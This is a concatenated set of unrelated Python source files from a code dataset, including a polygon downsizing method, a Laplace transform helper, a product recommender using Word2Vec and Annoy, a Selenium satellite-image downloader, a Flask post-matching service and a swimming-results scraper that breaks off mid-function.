downsize(self, maxerr=None, maxvert=0):\n\t\t'''\n\t\tReturns a new ASTPolygon that contains a subset of the vertices of this polygon.\n\t\t\n\t\tThe subset is chosen so that the returned polygon is a good approximation of this polygon,\n\t\twithin the limits specified. The density of points in the new polygon is greater\n\t\twhere the curvature of the boundary is greater.\n\t\t\n\t\tThe 'maxerr' parameter sets the maximum allowed discrepancy between the original and\n\t\tnew polygons as a geodesic distance within the polygon's coordinate frame. Setting this to zero\n\t\treturns a new polygon with the number of vertices set in \"maxvert\".\n\t\t\n\t\tThe 'maxvert' parameter sets the maximum number of vertices the new polygon can have. If this is\n\t\tless than 3, the number of vertices in the returned polygon will be the minimum needed\n\t\tto achieve the maximum discrepancy specified by \"maxerr\". 
An unadorned \"maxerr\" value is interpreted\n\t\tas radians, but Astropy unit objects are also accepted.\n\t\t\n\t\t:param maxerr: maximum allowed discrepancy, in radians, between the original and new polygons as a geodesic distance within the polygon's coordinate frame\n\t\t:param maxvert: maximum allowed number of vertices in the returned polygon\n\t\t:returns: a new ASTPolygon\n\t\t'''\n\t\t\n\t\t# should find some reasonable default values\n\t\tif None in [maxerr, maxvert]:\n\t\t\traise Exception(\"ASTPolygon.downsize: Both 'maxerr' and 'maxvert' must be specified.\")\n\t\t\n\t\tast_polygon = self.astObject.downsize(maxerr, maxvert)\n\t\treturn ASTPolygon(ast_object=ast_polygon)\n\n\n\n","sub_path":"cornish/region/polygon.py","file_name":"polygon.py","file_ext":"py","file_size_in_byte":12160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"292681311","text":"from engpy.misc.abilities import numable\nfrom engpy.misc.miscs import num\nfrom engpy.misc.gen import getter\nfrom engpy.misc.vars import greek_map\n\n\ndef laplace(expres, in_var='t', out_var='s'):\n    if in_var in greek_map:\n        in_var = greek_map[in_var]\n    new = expres.recreate\n    res = new(''); modifier = {}\n    refract = '0'\n    if len(out_var) > 1:\n        refract = new(out_var)\n        out_var = 's'\n    \n    for expr in expres.struct:\n        \n        if numable(expr):\n            res += f'{expr}/{out_var}'\n            continue\n        coeff = expr._coeff\n        var = expr.expr[coeff][0]\n        if len(var) > 1:\n            if 'ȩ' in var:\n                pows = var.pop('ȩ')\n                res += laplace(new({coeff:[var]}), in_var,out_var).cal({f'{out_var}':f'{out_var} - {pows.coeff(in_var)}'})\n                continue\n            if in_var in var:\n                pows = var.pop(in_var)\n                if pows > 0:\n                    res += (-1)** pows * laplace(new({coeff:[var]}), in_var,out_var).lin_diff(f'{out_var}',pows)\n                    continue\n        var_ = list(var)[0]; pow_ = var[var_]\n        if getter(var_,'name') not in (None, 'new'):\n            res += coeff * var_.laplace(in_var, out_var)\n        elif isinstance(var_, str):\n            if var_ == in_var:\n                res += coeff * new(f'{pow_}!/{out_var}^({pow_} + 1)')\n            elif var_ == 'ȩ' and not isinstance(pow_, int):\n                res += coeff * ~new(f'{out_var} - {pow_.coeff(in_var)}')\n\n    return res.unify(True) if isinstance(refract, str) else res.cal(s = refract).unify(True)\n","sub_path":"engpy/lib/transforms/laplace.py","file_name":"laplace.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"482793630","text":"import importlib\r\nfrom abc import ABC, abstractmethod\r\n\r\n\r\n# An abstract class that implements and declares common functionality for all parent selection methods\r\nclass ParentSelection(ABC):\r\n\r\n    @abstractmethod\r\n    def getCandidates(self, citizens):\r\n        raise NotImplementedError\r\n\r\n    @staticmethod\r\n    def factory(parentSelectionName):\r\n        
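# Resolve the concrete strategy by name; this follows the convention used\r\n        # here that module entities.parentselection.<Name> defines a class <Name>.\r\n        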
module = importlib.import_module('entities.parentselection.' + parentSelectionName)\r\n        parentSelection = getattr(module, parentSelectionName)\r\n        return parentSelection()\r\n","sub_path":"entities/parentselection/ParentSelection.py","file_name":"ParentSelection.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"542606357","text":"import re\nimport sys\nimport json\nimport gzip\nimport logging\nimport itertools\nimport pymorphy2\nimport numpy as np\nimport pandas as pd\nfrom annoy import AnnoyIndex\nfrom gensim.models.word2vec import Word2Vec\nimport pickle as pkl\n\nProduct_dict = pkl.load(open('Product_dict.pkl', 'rb'))\ndata=pd.read_csv('data.csv',nrows=100000)\ndata=data.applymap(str)\ndata['id']=data['contact_id']+' '+data['shop_id']+' ' +data['product_category_id']\ndata=data.drop(columns=['contact_id','shop_id','product_category_id'])\nmodel = Word2Vec.load('./hackaton.w2v_gensim3')\nmodel.similar_by_vector(model['1260627'] )\ndata_storage = {i[1]['product_id']:i[1]['id'] for i in data.iterrows()}\nindex_img_emb = AnnoyIndex(100)\nindex_img_emb.load('./hackaton_annoy_30')\nmap_id_hashimg = pkl.load(open('hackaton_map_id_to_hash_products.dict5', 'rb'))\nprod1 = pd.read_csv('prod111.csv')\nprod1.fillna(value='', inplace=True)\nprod1=prod1.applymap(str)\nprod1.drop(prod1.columns[prod1.columns.str.contains('unnamed',case = False)],axis = 1, inplace = True)\n\n\ndef request_id(a=134832):\n    pr = data.loc[data['product_id'] == str(a)]\n    pr.reset_index(inplace=True, drop=False)\n    vector = pr['id'][0]\n\n    vec = np.zeros(100)\n    for word in vector.split(' '):\n        if word in model:\n            vec += model[word]\n\n    data_storage_norm1 = vec\n    annoy_res = list(index_img_emb.get_nns_by_vector(data_storage_norm1, 13, include_distances=True, search_k=10000))\n    print('\\n\\nNeighbors:')\n    a = list()\n    for annoy_id, annoy_sim in itertools.islice(zip(*annoy_res), 13):\n        image_id = map_id_hashimg[annoy_id]\n        # print(image_id)\n        # print(data_storage[image_id], 1 - annoy_sim ** 2 / 2)\n        a.append(list(prod1.loc[prod1['index'] == str(image_id)]['0']))\n\n    return a\n\n","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"27582256","text":"import numpy as np\nimport random\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom models import DQN\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom sklearn import preprocessing\nfrom collections import namedtuple\n\nnum_node = 30\nfile = open(\"Data\\data_\" + str(num_node) + \".txt\", 'r', encoding='UTF-8') \nline = file.readlines()\n\nnum_node = int(line[0])\nnum_edge = int(line[1])\nnum_agent = int(line[num_node + num_edge + 2])\nconstraint = int(line[num_node + num_edge + num_agent + 3])\nmaxspeed = 0 \nCost = 0\n# lists = \"Model\\_3f_dist_no\"\n# lists = \"Model\\_3f_dist_1\"\nlists = \"Model\\_3f_dist_2\"\n# lists = \"Model\\saved_\"\n\nclass Node:\n    def __init__(self, pos, number):\n        self.pos = pos\n        self.number = number\n        self.connected_node = [] \n        self.in_commu_range = [] # nodes within communication range (constraint)\n        self.all_ag_here = [] # agents currently at this node\n    \nclass Edge:\n    def __init__(self, distance, number):\n        self.ox = 'x'\n        self.distance = distance \n        self.number = number\n        self.count = 0\n    \nclass Agent:\n    def __init__(self, cur, speed, number):\n        self.currnode_ori = 
cur\n        self.currnode = cur    \n        self.togonode = cur \n        self.lastedge = 0\n        self.togoedge = 0\n        self.curedge_length = 0 \n        self.step = 0\n        self.speed = speed\n        self.cost = 0\n        self.num = number\n        self.historyaction = []\n        self.reward = 0\n        self.start = cur\n        self.edgeLengthInfo = []\n        self.alreadyVisitInfo = []\n        self.edgeTotalConnectMap = [[0]*num_edge for i in range(num_edge)]\n        self.edgeTotalConnectInfo = []\n        self.totalAgentMap = [[0]*2 for i in range(num_edge)]\n        self.totalAgentInfo = []\n        self.edgeCountInfo = []\n        for i in range(num_edge):\n            self.edgeLengthInfo.append(0)\n            self.alreadyVisitInfo.append(0)\n            self.edgeTotalConnectInfo.append(0)\n            self.totalAgentInfo.append(0)\n            self.edgeCountInfo.append(0)\n        self.featureUpdate = []\n        for i in range(num_agent): \n            j = set()\n            self.featureUpdate.append(j)\n\nnode_ALL = []\nedge_ALL = {}\nagent_ALL = []\n\nfor i in range(num_node):\n    k = i + 2\n    line[k] = line[k].split()\n    for j in range(len(line[k])): \n        line[k][j] = int(line[k][j])\n    l = Node((line[k][1], line[k][2]), line[k][0])\n    node_ALL.append(l)\n\nfor i in range(num_edge):\n    k = num_node + i + 2\n    line[k] = line[k].split()\n    for j in range(len(line[k])): \n        line[k][j] = int(line[k][j])\n    l = Edge(line[k][2], i)\n    line[k].pop()\n    edge_ALL[tuple(line[k])] = l \n    start = line[k][0]\n    end = line[k][1]\n    node_ALL[start].connected_node.append(end) \n    node_ALL[end].connected_node.append(start)\n\nfor i in range(num_agent):\n    k = num_node + num_edge + i + 3\n    line[k] = line[k].split()\n    for j in range(len(line[k])): \n        line[k][j] = int(line[k][j])\n    l = Agent(int(line[k][1]), int(line[k][2]), int(line[k][0]))\n    agent_ALL.append(l)\n    if(maxspeed < int(line[k][2])): maxspeed = int(line[k][2])\n    node_ALL[l.currnode].all_ag_here.append(i)\n\n# work out which nodes are within communication range (constraint)\ndef cal_dis(a,b): return np.sqrt(np.square(abs(a.pos[0]-b.pos[0]))+np.square(abs(a.pos[1]-b.pos[1])))\nfor i in range(num_node):\n    for j in range(num_node):\n        if(cal_dis(node_ALL[i],node_ALL[j]) <= constraint): node_ALL[i].in_commu_range.append(j)\n\ndef find_edge(a,b):\n    if tuple([a,b]) in edge_ALL: return tuple([a,b])\n    else: return tuple([b,a])\n\n# feature matrix (todo)\nnum_feature = 3\ndef feature_matrix(ag):\n    X = np.zeros((num_node, num_feature))\n    for k in node_ALL[ag.currnode].connected_node:\n        ed = edge_ALL[find_edge(ag.currnode,k)].number\n        # distance\n        if ag.edgeLengthInfo[ed] != 0: \n            X[k][0] = ag.edgeLengthInfo[ed]\n        # # number of edges this edge connects to\n        X[k][1] = ag.edgeTotalConnectInfo[ed]\n        # number of times this edge has been traversed\n        X[k][2] = ag.edgeCountInfo[ed]\n    X = np.around((X), decimals=3)\n    return X\n\ndef update_info():\n    for u in range(num_agent):\n        for give in agent_ALL:\n            for receive in agent_ALL:\n                if receive.currnode in node_ALL[give.currnode].in_commu_range and give.num != receive.num:\n                    j = set()\n                    for infomation in set(give.featureUpdate[receive.num]):\n                        feat, edge = infomation\n                        if feat == 0: \n                            if receive.edgeLengthInfo[edge] == 0:\n                                receive.edgeLengthInfo[edge] = give.edgeLengthInfo[edge]\n                                j.add(infomation)\n                        if feat == 1: \n                            if receive.edgeTotalConnectInfo[edge] < give.edgeTotalConnectInfo[edge]: \n                                receive.edgeTotalConnectInfo[edge] = give.edgeTotalConnectInfo[edge]\n                                j.add(infomation)\n                        if feat == 2: \n                            if receive.edgeCountInfo[edge] < give.edgeCountInfo[edge]: \n                                receive.edgeCountInfo[edge] = give.edgeCountInfo[edge]\n                                j.add(infomation)\n                    for i in range(num_agent): \n                        if i != give.num and i != receive.num: receive.featureUpdate[i] = receive.featureUpdate[i].union(j)\n                    give.featureUpdate[receive.num].clear()\n                elif give.num == receive.num: 
give.featureUpdate[receive.num].clear()\n\nmodel = DQN(nfeat=num_feature)\nmodel.load_state_dict(torch.load(lists))\n\ndef pick_edge(ag): \n X = feature_matrix(ag)\n output = model(torch.from_numpy(X))\n outputnum = -1\n outputmax = -math.inf\n for i in range(num_node):\n if output[i] >= outputmax and i in node_ALL[ag.togonode].connected_node:\n outputmax = output[i]\n outputnum = i\n return outputnum\n\ndef walking(ag):\n if ag.currnode_ori != ag.togonode : \n edge_ALL[find_edge(ag.currnode_ori, ag.togonode)].ox = 'o'\n ag.edgeLengthInfo[edge_ALL[ag.togoedge].number] = ag.curedge_length\n ag.alreadyVisitInfo[edge_ALL[ag.togoedge].number] = 1\n for i in range(num_agent): ag.featureUpdate[i].add(tuple([0, edge_ALL[ag.togoedge].number]))\n ag.currnode = ag.togonode\n ag.currnode_ori = ag.togonode\n ag.lastedge = ag.togoedge\n ag.historyaction.append(ag.togonode)\n ag.step = ag.step - ag.curedge_length \n ag.togonode = pick_edge(ag)\n togo_edge = find_edge(ag.currnode, ag.togonode)\n ag.curedge_length = edge_ALL[togo_edge].distance\n ag.togoedge = togo_edge\n if ag.lastedge != ag.togoedge and ag.lastedge != 0:\n head = edge_ALL[ag.lastedge].number\n tail = edge_ALL[ag.togoedge].number\n ag.edgeTotalConnectMap[head][tail] = 1\n ag.edgeTotalConnectMap[tail][head] = 1\n ag.edgeTotalConnectInfo[head] = sum(ag.edgeTotalConnectMap[head])\n ag.edgeTotalConnectInfo[tail] = sum(ag.edgeTotalConnectMap[tail])\n for i in range(num_agent): \n ag.featureUpdate[i].add(tuple([1, head]))\n ag.featureUpdate[i].add(tuple([1, tail]))\n edge_ALL[ag.togoedge].count += 1\n ag.edgeCountInfo[edge_ALL[ag.togoedge].number] = edge_ALL[ag.togoedge].count\n for i in range(num_agent): ag.featureUpdate[i].add(tuple([2, edge_ALL[ag.togoedge].number]))\n\nk = 10000\nwhile not all(edge_ALL[r].ox == 'o' for r in edge_ALL):\n for ag in agent_ALL:\n ag.step += ag.speed\n ag.cost += ag.speed\n while ag.curedge_length <= ag.step: \n update_info()\n node_ALL[ag.currnode].all_ag_here.remove(ag.num)\n walking(ag) \n node_ALL[ag.currnode].all_ag_here.append(ag.num)\n if ag.step > ag.curedge_length/2:\n node_ALL[ag.currnode].all_ag_here.remove(ag.num) \n ag.currnode = ag.togonode\n node_ALL[ag.currnode].all_ag_here.append(ag.num)\n update_info()\n Cost += maxspeed\n if Cost > k:\n print(Cost)\n k += 10000\n\n\n# Write all action to file\nfileforHistoryaction = \"Animation/RL_\"+ str(num_node) +\".txt\"\nf = open(fileforHistoryaction, \"w\")\nprint(num_node, file = f)\nfor i in agent_ALL: print(i.historyaction, file = f)\n\nallEdgeCost = 0\nfor i in edge_ALL: allEdgeCost += edge_ALL[i].distance\nallAgentCost = 0\nfor i in agent_ALL: allAgentCost += i.cost\nall_historyaction = -num_agent\nfor i in agent_ALL: all_historyaction += len(i.historyaction)\n\n# for i in agent_ALL: print(i.historyaction)\nprint(\"Map cost = \",allEdgeCost)\nprint(\"All agents' cost = \",allAgentCost)\nprint(\"Repeated rate = \",\"%.2f\"%((all_historyaction-num_edge)/all_historyaction*100),\"%\") \nprint(\"Largest cost = \",Cost)","sub_path":"Validating_dist.py","file_name":"Validating_dist.py","file_ext":"py","file_size_in_byte":9023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"122019462","text":"#! /usr/bin/env python3\n\nimport sys \n\nfrom . 
import prepare_config_files, run_config_files, run_fsl_anat\n\nhelp_string = (\"\"\"oxasl_bids: BIDS interface for the oxford_asl pipeline\n\nUsage:\noxasl_bids prepare --bidsdir [--common_args]\noxasl_bids run --bidsdir \n\n\"Prepare\" creates an oxford_asl configuration file for each acquisition within the BIDS directory. \nCommon arguments will be added in to each configuration, overriding BIDS-derived parameters.\nAfter having used \"prepare\", the \"run\" command will execute the oxford_asl commands \nRun either command without arguments for more information.\"\"\")\n\ndef main(argv):\n cmd_dict = {'prepare': prepare_config_files, \n 'run': run_config_files, \n 'fsl_anat': run_fsl_anat }\n if (len(argv)) and (argv[0] in cmd_dict): \n cmd_dict[argv[0]](argv[1:])\n else: \n print(help_string)\n\nif __name__ == \"__main__\":\n argv = sys.argv[1:]\n main(argv)\n","sub_path":"oxasl_bids/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"605864538","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# hypothesis y = a + bx + cz + ...\nx = np.linspace(-2, 2, 100)\ny = np.linspace(0, 4, 100)\nX, Y = np.meshgrid(x, y)\nput = []\nx_in, y_in, z_in = [],[],[]\nZ = X * 2 + Y * 3 + 5\nfor p in x:\n for q in y:\n x_in.append(p)\n y_in.append(q)\n z_in.append(p * 2 + q * 3 + 5)\n\nfig = plt.figure(1)\nax = Axes3D(fig)\n# ax.scatter(X, Y, Z)\ninp = [np.ones(len(z_in)), x_in, y_in]\nip = np.array(inp)\nprint(ip)\nth = np.array([0, 0, 0])\nz = np.array(z_in)\n\n\nclass HypothesisTwo(object):\n def __init__(self, dimension, m, lr):\n self.theta = np.array([0, 0, 0])\n self.m = m\n self.lr = lr\n self.dimension = dimension\n\n def calculate(self, i):\n return np.dot(self.theta, i)\n\n def iteration(self, i, j):\n while round(np.sum(self.calculate(i) - j), 5) != 0:\n temp = []\n for h in range(self.dimension):\n temp.append(self.theta[h] - self.lr * (1 / self.m) * np.sum((self.calculate(i) - j) * i[h]))\n self.theta = np.array(temp)\n ax.cla()\n ax.scatter(X, Y, Z,color=\"blue\")\n ax.plot_surface(X, Y, self.theta[0]+self.theta[1]*X + self.theta[2]*Y,color=\"red\")\n ax.text(0,0,-1,self.__str__(),fontdict={'size': 10, 'color': 'red'})\n plt.pause(0.1)\n # plt.cla()\n # plt.scatter(i, j)\n # plt.plot(i, hypo.a + hypo.b * i, 'r-', lw=5)\n # plt.text(0.5, 0, \"y = %.2f + %.2f x\" % (self.a, self.b), fontdict={'size': 20, 'color': 'red'})\n #\n\n def __str__(self):\n out = \"\"\n for l in range(self.dimension):\n if l == 0:\n out = out + \"z = %.2f \" % self.theta[l]\n else:\n out = out + \"+ %.2f*x%d \" % (self.theta[l], l)\n return out\n\n\nhypo = HypothesisTwo(3, len(z_in), 0.1)\n\nhypo.iteration(ip, z)\nprint(hypo)\n\n# plt.show()\n","sub_path":"WuEnda/LinearRegression2.py","file_name":"LinearRegression2.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"163247484","text":"from edge_list_graph import Edge as Edge\nfrom edge_list_graph import Graph as Graph\nfrom edge_list_graph import Vertex as Vertex\n\nfrom adjacency_list_graph import Edge as Edge\nfrom adjacency_list_graph import Graph as Graph\nfrom adjacency_list_graph import Vertex as Vertex\ng = Graph()\n\ng.insert_vertex(15)\ng.insert_vertex(6)\ng.insert_vertex(38)\ng.insert_vertex(123)\ng.insert_vertex(66)\n\ng.insert_edge(10,15,38)\ng.insert_edge(23, 
15,6)\ng.insert_edge(90, 15,66)\ng.insert_edge(8, 66,6)\ng.insert_edge(2, 66,38)\ng.insert_edge(76, 66,123)\ng.insert_edge(7, 123,6)\ng.insert_edge(55, 123,38)\n\n\nLastVisitet = 0\nmx = -1\nmySet = set()\ndef max_value(graf : Graph, vertex):\n    # LastVisitet must be global too, otherwise it is an unbound local\n    # whenever the vertex has already been visited\n    global mx, LastVisitet\n\n    if(mySet.__len__() == graf.num_vertices()):\n        return mx\n    if(vertex > mx):\n        mx = vertex\n    if not mySet.__contains__(vertex):\n        mySet.add(vertex)\n        LastVisitet = vertex\n        for i in graf.adjacent_vertices(vertex):\n            if not mySet.__contains__(i):\n                return max_value(graf, i)\n    \n    return max_value(graf, LastVisitet)\n\nprint(max_value(g, 15))","sub_path":"lektion 5 grafer dfs og bfs/opgaver.py","file_name":"opgaver.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"594500379","text":"from django.conf import settings \nfrom django.test import RequestFactory\nfrom django.utils.importlib import import_module\n\nclass SessionProductVariablesMixin(object):\n    \"\"\"\n    Adds specified product to test session \n    \"\"\"\n\n    def remove_product(self, product, request_function):\n\n        self.factory = RequestFactory()\n        engine = import_module(settings.SESSION_ENGINE)\n        session_key = None \n\n        request = request_function()\n        request.session = engine.SessionStore(session_key)\n\n        if product == 'basic_subscription':\n            request.session['basic_subscription'] = True \n            request.session['total'] = 18\n\n        if product == 'plus_subscription':\n            request.session['plus_subscription'] = True \n            request.session['total'] = 45 \n\n        if product == 'lets_meditate':\n            request.session['lets_meditate'] = True \n            request.session['total'] = 35\n\n        return request","sub_path":"checkouts/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"61645749","text":"# No2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndata = {'apples': 10, 'oranges': 15, 'lemons': 5, 'limes':20}\r\nplt.figure()\r\nx = data.keys()\r\ny = data.values()\r\nplt.scatter(x, y, color = \"r\", s = 100)\r\nplt.plot(x, y, color= \"g\")\r\nplt.bar(x, y, width = 0.5)\r\nplt.show()\r\n","sub_path":"python_work1/No2.py","file_name":"No2.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"300765307","text":"from selenium.webdriver.common.action_chains import ActionChains\nfrom selenium import webdriver\nimport time\nfrom datetime import datetime\n\n# record the start time\nstart_time = datetime.now()\n\n# helper: zero-pad numbers below 10, e.g. 3 -> 03\n\"\"\"\n    args:\n        num (int)\n    return:\n        string format.\n\"\"\"\ndef formatNumber(num):\n    if num<10:\n        return '0'+str(num)\n    else:\n        return str(num)\n\n# Load the browser driver, Chrome in this case. Download the driver that matches the installed browser version.\n# Download source: https://chromedriver.chromium.org/downloads\nbrowser = webdriver.Chrome('./chromedriver')\n# set windows size\nbrowser.set_window_size(1024, 768)\n# The Accept button has to be clicked the first time the page opens, so the flag variable tracks the first run.\nflag=0\n\n# years\nyearList=[2020]\n# months\nmonthList=[1,2,3,4,5,6,7,8]\n# days in each month\ndayList=[31,28,31,30,31,30,31,31]\n# build the timestamps in YYYYMMDD-HH format, e.g. 20200926-08 \nqueryList=[]\n# satellite-hd-10min, top-alert-10min, satellite-water-vapor-10min\nmode= 'satellite-hd-10min'\n\nfor i in yearList:\n    for j in monthList:\n        for k in range(1, dayList[j-1]+1):\n            for hour in range(24):\n                queryList.append(str(i)+formatNumber(j)+formatNumber(k)+'-'+formatNumber(hour))\n\n# print(queryList)\nprint('Total timestamps to scrape: ', len(queryList))\n
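\n# Each iteration below loads one timestamped page and clicks through to download\n# a single satellite image; a short time.sleep() between requests would keep the\n# scrape rate polite.\n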
\nfor i in queryList:\n    # build the URL of the page to scrape\n    url = 'https://meteologix.com/tw/satellite/taiwan/'+str(mode)+'/'+str(i)+'00z.html'\n    browser.get(url)\n\n    # first run only: the Accept button has to be clicked once\n    if flag==0:\n        time.sleep(1)\n        browser.find_element_by_css_selector('.nx3Fpp8U.nx3gnDVX').click()\n        flag=1\n    time.sleep(0.5)\n    # disable the city name overlay (located by XPath)\n    browser.find_element_by_xpath('/html/body/div[1]/div/div[6]/div/div[1]/div/div/div[1]/div[1]/div[3]/div[1]/div[13]/div[9]/button[4]').click() \n    # click menu by xpath\n    browser.find_element_by_css_selector('.btn-group').click() \n    time.sleep(0.5)\n    # click download image by xpath\n    browser.find_element_by_xpath('/html/body/div[1]/div/div[6]/div/div[1]/div/div/div[1]/div[1]/div[3]/div[1]/div[1]/div/div/ul/li[3]/span[2]').click() \n    print(str(i), ' done!')\n\n\n# report the total runtime\nend_time = datetime.now()\nprint('Duration: {}'.format(end_time - start_time))\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456769439","text":"__author__ = 'Siyao'\n\nfrom base import *\nfrom nltk.corpus import stopwords\nimport nltk\nfrom stemming.porter2 import stem\n\n\n# <get_question>\n@app.route('/get_question', methods=['GET', 'POST', 'OPTIONS'])\n@crossdomain(origin='*', headers='Content-Type')\ndef get_question_for_post():\n    data = json.loads(request.stream.read())\n    content = {'q': data['tags'] + data['content']}\n    import requests\n    r = requests.get(SOLR_SERVER_ADDRESS, params=content).json()\n    if r['response']['numFound'] != 0:\n        return json.dumps(r['response']['docs'][0])\n    else:\n        return response.response_fail(\"No question found\")\n\n\n@app.route('/question_answered/<question_id>', methods=['GET', 'POST', 'OPTIONS'])\n@crossdomain(origin='*', headers='Content-Type')\ndef question_answered_update_answered_count(question_id):\n    try:\n        return response.response_ok()\n    except:\n        return response.response_fail(\"Failed to update answer count\")\n# </get_question>\n\n\n# <topic_match>\n@app.route('/topic_match', methods=['POST', 'OPTIONS'])\n@crossdomain(origin='*', headers='Content-Type')\ndef topic_match():\n    try:\n        raw = json.loads(request.stream.read())\n        data = raw['data']\n        status = raw['status']\n        min_index = get_most_similar_post(status, data)\n        return response.response_ok(min_index)\n    except Exception as e:\n        return response.response_fail(\"Error getting match %s\" % e)\n\n\ndef get_most_similar_post(status, all_posts):\n    stops = set(stopwords.words('english'))\n    all_tokens = set()\n    # process all posts for tokens and store them in lists\n    tokens_list_for_posts = []\n    for d in all_posts:\n        context = d.get('message', None)\n        if context is None:\n            context = d['description']\n        tokens = get_tokens(context, stops)\n        tokens_list_for_posts.append(tokens)\n        all_tokens.update(tokens)\n    # process status for tokens too\n    status_tokens = get_tokens(status['text_content'], stops)\n    all_tokens.update(status_tokens)\n\n    # get vector for each post\n    all_tokens = list(all_tokens)\n    all_post_vectors = []\n    for tokens_for_one_post in tokens_list_for_posts:\n        vector_for_one_post = get_vector(all_tokens, tokens_for_one_post)\n        all_post_vectors.append(vector_for_one_post)\n    # get vector for status\n    status_vector = get_vector(all_tokens, status_tokens)\n\n    # compute distance between status and posts, and return the min distance index\n    dist_list = [vector_distance(status_vector, i) for i in all_post_vectors]\n    return dist_list.index(min(dist_list))\n\n\ndef get_vector(all_tokens, 
\n\ndef get_vector(all_tokens, tokens_for_one_post):\n    from math import sqrt, pow\n    vector_for_one_post = [0] * len(all_tokens)\n    for i in range(len(all_tokens)):\n        if all_tokens[i] in tokens_for_one_post:\n            vector_for_one_post[i] += 1\n    length = sqrt(sum([pow(i, 2) for i in vector_for_one_post]))\n    if length != 0:\n        return [i/length for i in vector_for_one_post]\n    else:\n        return vector_for_one_post\n\n\ndef get_tokens(text, stops):\n    lower_case = nltk.word_tokenize(text.lower())\n    return [stem(t) for t in lower_case if t not in stops and t.isalpha()]\n\n\ndef vector_distance(status_vector, post_vector):\n    # avoid returning post with no content\n    if all(el == 0 for el in post_vector):\n        return 1e9\n    dist = 0.0\n    for i, j in zip(status_vector, post_vector):\n        dist += (i - j) * (i - j)\n    return dist\n# \n","sub_path":"portals.py","file_name":"portals.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"316087470","text":"import urllib.request\r\nimport json\r\nimport sqlite3\r\nimport random\r\nimport re\r\nfrom constants import *\r\nfrom helperfunctions import *\r\nfrom team_dict import *\r\nfrom bs4 import BeautifulSoup\r\n\r\n########################################################################################################################\r\n# College Swimming Summer Break Project 2019                                                              Brad Beacham #\r\n# Adapted from code by Kevin Wylder                                                                                    #\r\n# This file builds a database from data collected off collegeswimming.com for more detail on the structure of the     #\r\n# database, the global variables in this file, or the collegeswimming.com website structure, see the README or        #\r\n# constants file                                                                                                       #\r\n#                                                                                                                      #\r\n# From here on out, 120 character width isn't guaranteed, but is usually followed                                      #\r\n########################################################################################################################\r\n\r\n\r\ndef request_swimmer(swimmer_id, event, search_start_timestamp, search_end_timestamp):\r\n    \"\"\"\r\n    :param swimmer_id: Integer ID number of a specific swimmer\r\n    :param event: the code used for classifying a given event\r\n    :param search_start_timestamp: integer timestamp representing the beginning of the time frame we are collecting\r\n    data from\r\n    :param search_end_timestamp: integer timestamp representing the end of the time frame we are collecting data from\r\n    :return swimmer_data: a 2-D array where the first column is the date a swim took place, second column is the time\r\n    achieved by the swimmer in that event, and the third column is the numerical ID of the meet they were competing in.\r\n    \"\"\"\r\n    swimmer_data = []\r\n    swimmer_events = []  # This will be filled with the list of all events that this swimmer has participated in\r\n    url = SWIMMER_URL.format(swimmer_id)\r\n    try:  # to open a url for that swimmer and read their data\r\n        page = urllib.request.urlopen(url)\r\n        source = page.read()\r\n    except urllib.request.HTTPError as e:\r\n        print(e)  # otherwise print out the error and return empty list\r\n        return [[0, 0, 0]]\r\n    soup = BeautifulSoup(source, 'html.parser')\r\n    selection = soup.find(\"select\", class_=\"form-control input-sm js-event-id-selector\")\r\n    if selection:\r\n        for eventOption in selection.find_all(\"option\", class_=\"event\"):\r\n            swimmer_events.append(eventOption[\"value\"])\r\n\r\n    # If the event you want data on is contained within the list of events that swimmer has participated in, then add\r\n    # that data to swimmer_data\r\n    if event in swimmer_events:\r\n        url = 
SWIMMER_EVENT_URL.format(swimmer_id, event)\r\n try: # open and read url containing info on \"event\" for \"swimmer_id\"\r\n page = urllib.request.urlopen(url)\r\n source = page.read()\r\n except urllib.request.HTTPError as e:\r\n print(e)\r\n return [[0,0,0]]\r\n event_history = json.loads(source)\r\n for swim in event_history:\r\n # convert the date string of a swim to time since epoch (in seconds)\r\n split_date = swim[\"dateofswim\"].split(\"-\")\r\n date = convert_to_time(int(split_date[0]), int(split_date[1]), int(split_date[2]))\r\n # if the swim occurred during desired time frame, add it to swimmer_data\r\n if search_start_timestamp < date < search_end_timestamp:\r\n swim_list = [date, swim[\"time\"], swim[\"meet_id\"]]\r\n swimmer_data.append(swim_list)\r\n return swimmer_data\r\n\r\n\r\ndef get_roster(team_id, season, gender):\r\n \"\"\"\r\n Input: a team_id, season, and gender used to uniquely identify a team\r\n Output: List of tuples containing swimmer names and IDs\r\n :param team_id: integer ID for a team\r\n :param season: string representing the season we are looking at (e.g. \"2017-2018\" season)\r\n :param gender: String M or F 